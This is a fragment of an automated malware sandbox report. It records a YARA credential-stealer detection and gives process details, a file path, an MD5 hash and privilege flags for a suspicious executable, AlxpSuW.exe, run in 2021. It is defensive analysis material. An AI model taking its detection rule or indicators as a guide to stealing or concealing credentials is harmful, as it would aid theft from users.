                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Start time:15:31:04
                                                        Start date:12/04/2021
                                                        Path:C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe'
                                                        Imagebase:0x8c0000
                                                        File size:623104 bytes
                                                        MD5 hash:7A7078E03FD2FEE66B7436DA7222D2E0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >